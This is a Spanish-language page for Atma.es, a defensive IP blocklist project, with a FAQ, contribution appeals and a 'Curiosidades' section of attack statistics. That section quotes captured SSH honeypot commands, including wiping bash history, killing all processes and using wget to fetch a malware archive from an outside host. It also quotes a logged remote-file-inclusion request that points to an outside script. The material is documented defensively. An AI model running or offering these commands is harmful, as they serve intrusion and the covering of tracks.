Presentación
El objetivo de Atma.es es identificar direcciones de red maliciosas en internet tales como:
-
Ataques que permiten espiar o incluso tomar el control remoto de ordenadores ajenos por medios como la terminal remota de Microsoft, SSH, Telnet, o servidores de escritorio remoto.
-
Riesgos relacionados con el correo electrónico, como el rastreo y validación de direcciones de correo para enviar correo basura, el robo de cuentas, etc.
-
Sitios que tratan de infectar a sus visitantes con virus, troyanos, programas espía, etc. o bien son usados por éstos para comunicarse con sus creadores cuando ya se ha producido la infección.
-
Peligros para servidores: explotación de vulnerabilidades, identificaciones falsas, ataques para tomar su control, etc.
-
Escaneos en busca de puertas traseras por donde poder acceder a ordenadores vulnerables a través de la identificación del sistema operativo y su versión, programas y servicios que se están ejecutando, etc.
-
Distribución de virus, gusanos, etc. a través de redes P2P, o simplemente de archivos o tráfico corrupto.
La lista con las direcciones identificadas se actualiza periódicamente y se ofrece en formato PeerGuardian, válido para cualquiera de los programas de bloqueo más habituales. Tan sólo tendrá que indicarle una de las siguientes direcciones para su descarga:
http://galinux.myftp.org/atma.p2p
http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm (Comprimido con Gz)
Documentación
Guias de uso 
Peerguardian 2 para Windows
IPlist/IPblock 0.26 para Linux
Preguntas y respuestas
¿Cómo puedo usar la lista blacklist/atma?
La mayoría de programas de bloqueo vienen con unas pocas listas preconfiguradas a elegir entre las que no suele estar blacklist.p2p/atma.p2p. La forma de añadirla varía en cada uno pero suele ser una tarea bastante sencilla. Si lo deseas, puedes ver cómo hacerlo con Peerguardian e IPlist/IPblock en la sección "guías de uso". Nuestra lista se publica en formato Peerguardian 1, que es compatible con la práctica totalidad de los programas de bloqueo existentes. Si aún no lo has hecho, puedes elegir uno en la sección de descargas.
En cuanto a términos de uso, la lista es libre y gratuíta para cualquier fin no lucrativo. Si no es el caso, consúltanos.
¿Porqué debería de usar esta lista si el programa que yo uso ya trae varias?
Sobre todo porque algunas direcciones de Internet que recogemos en ella frecuentemente no aparecen en otras listas o lo hacen pasado un tiempo, por varios motivos:
- Identificamos las direcciones peligrosas con herramientas propias no publicadas en ningún sítio y que no están basadas en ninguna otra. Los atacantes no pueden esquivarlas porque no saben cómo funcionan (en el caso de que supiesen de su existenca). Además, tampoco pueden saber dónde les estamos esperando porque usamos direcciones IP dinámicas, es decir, que cambian periódicamente. Tras un ataque, cuando vean al día siguiente que aparecen en nuestra lista, nosotros ya habremos cambiado de dirección IP y resultará inútil que avisen a sus cómplices.
- Es elaborada por hispanohablantes. Al menos en temas informáticos, la lengua inglesa es imperante. Por ello, los atacantes suelen saber Inglés pero resulta mucho menos probable que entiendan el Español/Castellano, por lo que en muchas ocasiones no llegan jamás a saber que han caído en una trampa, o cuál era: tan simple como que no comprenden lo que ven en sus monitores.
- EL método habitual de detección de ataques es la vigilancia más o menos pasiva de lo que llega a nuestra red local, pero nosotros no esperamos sentados a que nos ataquen por casualidad. Por el contrario, emitimos una gran cantidad de señales falsas aparentando ser una red vulnerable de una empresa media, consiguiendo atraer a un gran número de atacantes en muy poco tiempo. Incluso cuando hay expectativas de identificar a toda una banda, frecuentemente nos infiltramos en sus grupos haciéndonos pasar por "hackers/crackers" (existe una polémica bastante absurda sobre el significado exacto de estos términos).
¿Debería de usar sólo esta lista o combinada con otras?
Por una parte, cuantas más listas uses, más lento se volverá tu programa de bloqueo. Por otro lado, a pesar de que incluímos direcciones peligrosas recogidas por terceros en otras listas, es casi imposible que estén todas las que debieran. Siempre resultará más seguro usar más de una fuente. En cualquier caso recuerda que en nuestra lista no hay direcciones sobre publicitad, contenidos sexuales, etc. si no son peligrosas.
Por otra parte, y al igual que otras listas, no incluímos IPs reservadas por IANA, como las de red local, etc. Se supone que tales IPs no son usadas externamente, pero algunos atacantes las usurpan. Debes tenerlo en cuenta a la hora de configurar tu enrutador, cortafuegos, etc. o al menos usar una lista adicional específica para esas IPs. Tampoco bloqueamos direcciones de sitios o compañias de especial importancia, tales como Google, Microsoft, Yahoo, Megaupload, etc. Pero ten presente que puedes encontrarte, por ejemplo, muchos sitios maliciosos con tan sólo hacer una búsqueda en Google.
¿Seguiré necesitando antivirus, cortafuegos, etc.?
Sí. Usando nuestra lista con su programa de bloqueo, solamente evita el contacto por Internet con gran parte de los equipos peligrosos que acechan en la red... ¡pero podría usted dar con uno nuevo o no identificado!. Además, hay muchas formas de infectar un ordenador que no hacen uso de la red, como puede ser con memorias USB, archivos en CDs, etc.
¿Es una lista muy usada?
Suponemos que no, pero sólo tenemos datos fehacientes de las descargas desde uno de los alojamientos (galinux.myftp.org). Como dato orientativo, desde ese sitio se descargó 5000 veces en enero de 2010.
¿Qué significan las descripciones que veo en las alertas de mi programa de bloqueo?
Recuerde que el hecho de que un atacante tenga un objetivo determinado, no significa que vaya a renunciar otro si se le presenta la ocasión. Tampoco un ordenador que corra con un sistema operativo queda por ello protegido de todo tipo de ataques no específicos contra ese en concreto. Por ejemplo, hay formas de ejecutar servicios propios de Unix/Linux tales como SSH en equipos con Windows, y viceversa; incluso hay riesgos universales como por ejemplo, tener funcionando un servidor FTP con una contraseña débil. Dicho eso, las alertas responden a tres tipos de objetivos:
- Ataques específicos a servidores
- Peligros para usuarios de programas de intercambio
- Amenazas para todo tipo de usuarios y equipos
Según su gravedad, los escaneos sólo tratan de obtener algún tipo de información (aunque pueden ser el primer paso para un ataque más serio). En el otro extremo, identificamos con "several attacks" a aquellas IPs de las que hemos detectado varios tipos de ataques, y que por ello resultan las más peligrosas.
Curiosidades
Ejemplos de ataques detectados por SSH:
| Obteniendo información w uptime id ls -a uname -a cat /proc/cpuifno ps x wget curl -O Ataque tras una conexión anterior rm -rf .bash_history history -c w ps x ls -a Tratando de escapar de la trampa bash sh kill -9 -1 reboot exit |
Enviando malware al equipo atacado uname -a passwd wget http://nasa.undernet.nm.ru/udp.tgz tar zxvf udp.tgz Otros envíos venían de |
Algunas detecciones llamativas:
- Archivos falsos en la red Gnutella desde la IP 65.55.102.24 (Microsoft Corporation) el 21 de octubre y 1 de noviembre de 2009.
- Escaneo de puertos en septiembre y octubre de 2009 desde la IP 208.43.71.139 (Avast Antivirus).
- Escaneo de puertos el 21 de diciembre de 2009 desde la 69.48.241.84 (www.trustedsource.org perteneciente a McAfee Antivirus).
Programas de bloqueo descargando blacklist/atma en la primera semana de Diciembre de 2009:
| Descargas 760 253 112 43 14 7 4 4 2 1 Totales 916 253 14 11 |
Programa/Versión PeerBlock/1.0.0.181 PeerGuardian/2.0 PeerBlock/1.0.0.202 PeerBlock/1.0.0.223 BlockControl/1.6.9 PeerBlock/0.9.2.86 IPblock/0.18 IPblock/0.27 IPblock/0.26 PeerBlock/1.0.0.187 Programa PeerBlock PeerGuardian BlockControl IPblock |
|
En septiembre de 2009 intentaron averiguar la contraseña de 10374 nombres de usuario distintos. Los más atacados fueron:
| 9850 1034 690 431 264 224 208 206 195 190 |
root admin test oracle user guest robert mysql michael paul |
190 177 176 176 168 166 162 154 152 148 |
info postgres amanda adam sales martin backup student ftpuser suporte |
132 130 130 130 126 126 124 120 115 114 |
testing nagios eric david web tester john richard sarah sam |
114 110 107 106 104 102 101 100 100 100 |
patrick bruce matt mark cyrus teste marc webmaster download |
Conclusi�n: crear cuentas de usuarios que no est�n en ingl�s dificulta en gran medida los ataques. Hispanohablantes eviten "david".
Los chicos malos no descansan nunca:
2009, noche del 24 al 25 de diciembre. Mientras buena parte del mundo celebra en familia el aniversario del nacimiento de Jesucristo, los atacantes aprovechan la ocasión. En pocas horas se detectaron tantos ataques como en varios días cualquiera. El más llamativo fue un ataque de diccionario por SSH recibido desde 209.44.120.2 que duró 8 horas durante las que probó 20.859 combinaciones de usuario + contraseña.
Formas "curiosas" de luchar contra el cibercrimen:
Visita recibida desde www.delitosinformaticos.gov.co (agencia gubernamental colombiana "Grupo Investigativo Delitos Informáticos") :
200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
Sin comentarios.
Colaborar
- ¿Alguna vez has perdido importantes documentos por culpa de virus, troyanos, gusanos, etc.?
- ¿Has perdido alguna vez un montón de horas tratando de desinfectar o recuperar tu ordenador?
- ¿Desearías que nadie se dedicase a rastrear lo que haces en Internet?
- ¿Sabes que a diario se producen fraudes y robos "on-line" de cuentas bancarias, números de tarjetas, etc.?
- ¿Odias tener que dedicar todos los días un buen rato a limpiar tu bandeja de entrada de correo basura?
Hay muchas formas en las que puedes ayudar a protegernos todos de los culpables:
1-Usando y difundiendo nuestra lista
Puedes ayudarnos y ayudar a otros a protegerse dando a conocer nuestro trabajo enlazándolo desde tu sitio web o blog, recomendándolo a tus contactos, etc. Además, si usas nuestra lista, te agradecemos que nos comuniques si te ha bloqueado el acceso a algún sitio legítimo, si crees que alguno peligroso ha cambiado de IP o cualquier otra cosa que nos ayude a mejorar.
Por otra parte, como el número de descargas va en aumento, previsiblemente tendremos problemas en un futuro próximo. Si dispones de algún alojamiento con capacidad de tráfico excedente y dos megabytes libres, puedes ayudarnos manteniendo una copia de la versión más nueva de la lista. En ese caso infórmanos para incluír tu sitio en la sección "Presentación".
2-Envío de registros ( logs ) de programas que pueden identificar IPs peligrosas
Hemos elaborado algunas herramientas automáticas de búsqueda, selección y clasificación de direcciones IP atacantes a partir de registros generados por distintos programas, por lo que podemos procesar los recibidos es cuestión de segundos sin tan siquiera mirarlos. Si crees que algún registro de tu sistema puede ser de utilidad, escríbenos: seguramente podríamos usar varios de ellos. Por el momento estamos trabajando con los de algunos programas de intercambio P2P, con los de ciertos modelos de enrutadores (routers) y también con los de de sistemas Linux y algún otro programa.
3-Envío suelto de direcciones IP o rangos de IPs.
Si sabes cómo identificarlas en un contexto concreto (correos basura que dirigen a ciertos sitios, ataques a tus servidores, corrupción de archivos en P2P, registros de Linux, etc.) puedes enviarnos aquellas que vayas encontrándote. Hay muchas formas en las que se pueden detectar IPs peligrosas con muy poco esfuerzo durante el trabajo habitual frente al ordenador.
4-Instalación de trampas para atacantes
Conocidas como "Tarros de miel" ( Honey Pots ), hacen que nuestro ordenador o red local parezcan lo que no son desde el exterior, simulando otros sistemas operativos, servicios o programas inexistentes, falsas "puertas traseras" abiertas, etc. Pueden llegar a ser enormemente complicadas, pero las más simples son muy fáciles de instalar y efectivas en la mayoría de los casos. Si te decides por esta opción, aquí estaremos para asesorarte en el proceso.
5-Avisos de falsos positivos, revisión de IPs o rangos identificados por otros miembros, etc.
Todos nos podemos equivocar e incluír en la lista a direcciones que no son peligrosas; además es necesario eliminar periodicamente a los que ya no lo sean, atender a solicitudes de exclusión, etc. Es bienvenida toda la ayuda posible en la gestión diaria de la lista pero, sobre todo, que nos hagas saber si nuestra lista está bloqueando a algún sitio legítimo.
Enlaces
Programas de bloqueo para Microsoft Windows
Programas de bloqueo para Linux
Programas de bloqueo para Mac-OS
Si conoces algún otro, agradecemos que contactes con nosotros para incluírlo en esta lista.
Fuentes externas de direcciones peligrosas
En nuestra lista integramos diariamente las más recientes amenazas detectadas en otros sitios de confianza:
| MalwareDomainList.com | sshBL.org |
| ProjectHoneyPot.org | Sans.org |
| Twitter.com/olaf_j | DnsBL.abuse.ch |
| Antispam.Andreotti.nl | Twitter.com/HoneyPoint |
| Autoshun.org | MaliciousNetworks.org |
Es posible que te encuentres algunas IPs que aparecen en esos sitios pero no en nuestas lista. Ello es debido a que no añadimos todas ellas de forma automática si no siguiendo nuestros propios criterios.
Ocasionalmente consultamos también:
HoneyNet.cz Cimsuyu.com MalwareURL.com Amos.TwilightParadox.com Fugitif.DynDns.org Lira.cis.upenn.edu Smp.rnc.ro Shinshu.fm/ Mtc.sri.com Proxy1.twaren.net Dr-data.net Websworld.org EmergingThreats.net MalwarePatrol.net ZeusTracker.abuse.ch Cs.Rutgers.edu StopForumSpam.com Semeliker.net Old-noritake.org assurtis-tours.com Danger.rulez.sk Tcc.edu.tw IPillion.com
Contacto
Visita nuestro grupo en Google o envíanos un correo electrónico.